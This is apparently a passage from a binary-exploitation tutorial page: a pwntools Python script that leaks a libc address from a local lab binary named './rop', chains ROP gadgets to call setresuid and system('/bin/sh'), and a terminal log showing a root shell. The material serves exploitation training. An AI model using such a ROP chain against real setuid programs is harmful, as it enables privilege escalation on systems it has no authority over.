...
Code Block | ||||
---|---|---|---|---|
| ||||
from pwn import * from struct import * #context.log_level = 'debug' #64bit OS - /lib/x86_64-linux-gnu/libc-2.23.so libcbase_printf_offset = 0x55800 libcbase_system_offset = 0x45390 libcbase_setresuid_offset = 0xcd570 binsh_offset = 0x18cd57 pop_rdi_ret = 0x400843 pop_rsi_ret = 0x400841 pop_rdx_ret_offset = 0x1150c9 r = process('./rop') r.recvn(10) r.recvuntil('Printf() address : ') libcbase = int(r.recvuntil('\n'),16) libcbase -= libcbase_printf_offset payload = "A"*72 payload += p64(pop_rdi_ret) payload += p64(0) payload += p64(libcbase + pop_rdx_ret_offset) payload += p64(0) payload += p64(0) payload += p64(libcbase + libcbase_setresuid_offset) payload += p64(pop_rdi_ret) payload += p64(libcbase + binsh_offset) payload += p64(libcbase + libcbase_system_offset) r.send(payload) r.interactive() |
Code Block | ||
---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/ROP$ python ropexploit.py [+] Starting local process './rop': pid 5698 [*] Switching to interactive mode $ id uid=0(root) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
Related site
- N/a
Comments
Panel |
---|